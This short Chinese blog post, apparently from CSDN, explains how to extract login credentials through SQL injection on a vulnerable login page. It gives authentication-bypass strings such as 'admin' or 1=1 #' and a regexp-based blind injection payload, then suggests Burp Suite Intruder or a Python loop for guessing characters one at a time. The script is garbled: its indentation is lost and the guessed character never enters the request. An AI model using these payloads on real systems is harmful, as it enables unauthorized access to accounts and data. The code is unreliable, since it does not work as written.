利用brupsuite或python 破解登录账号与密码

碰到一个存在注入漏洞的登录页面时,当尝试过多种万能密码均无效时,不妨采用获取数据的方法

比如通过 username=admin' or 1=1 #  username=admin' or 1=# 判断存在注入漏洞后 万能密码不起效果。

可以构造一下playload:username=admin' or user() regexp '^a' #

然后通过brupsuite的Intruder模块进行逐个字符的猜解即可。

当然也可以通过写脚本的方式进行猜解:

核心代码:

msg=' '

for i in xrange(10):

for playload in playloads :

data= "username=admin' or user() regexp '^a' #"

r=requests.post(url,header,data=data)

if len(r.content)==12:

msg=msg+playload

print(msg)

break

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值